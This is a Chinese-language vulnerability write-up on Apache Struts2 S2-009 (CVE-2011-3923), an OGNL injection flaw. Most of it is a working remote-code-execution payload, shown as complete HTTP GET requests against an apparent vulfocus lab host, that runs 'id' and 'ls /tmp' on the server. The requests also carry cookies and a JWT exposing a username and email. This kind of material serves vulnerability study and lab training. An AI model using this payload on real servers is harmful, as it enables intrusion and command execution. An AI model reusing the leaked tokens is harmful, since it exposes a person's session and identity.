struts-s2-009 代码执行 (CVE-2011-3923)
所有文章,仅供安全研究与学习之用,后果自负!
struts-s2-009 代码执行 (CVE-2011-3923)
0x01 漏洞描述
这个漏洞跟s2-003 s2-005 属于一套的。 Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行它,从而绕过官方对#、\等特殊字符的防
0x02 影响范围
2.1.0 - 2.3.1.1
0x03 漏洞复现
漏洞触发地址
/ajax/example5.action
payload
/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27id%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]
(1)访问靶场
(2)访问漏洞触发地址
(3)抓包发送以下请求包
GET /ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1
Host: vulfocus.fofa.so:38193
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636015562,1636016317,1636076952,1636084136; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1636095790; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM2MTcwNDk1LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.jTl3hF779uO3OuYHGI5kORhHsDhkY2ZWvATJUG5gr_Q; JSESSIONID=FF0793D77BEA63813162E90223CEEB91; PHPSESSID=n7oiu58u8du9ussoeu0nl74334
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
ls /tmp
GET /ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ls%20/tmp%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1
Host: vulfocus.fofa.so:38193
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636015562,1636016317,1636076952,1636084136; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1636095790; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM2MTcwNDk1LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.jTl3hF779uO3OuYHGI5kORhHsDhkY2ZWvATJUG5gr_Q; JSESSIONID=FF0793D77BEA63813162E90223CEEB91; PHPSESSID=n7oiu58u8du9ussoeu0nl74334
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
0x04 漏洞修复
升级版本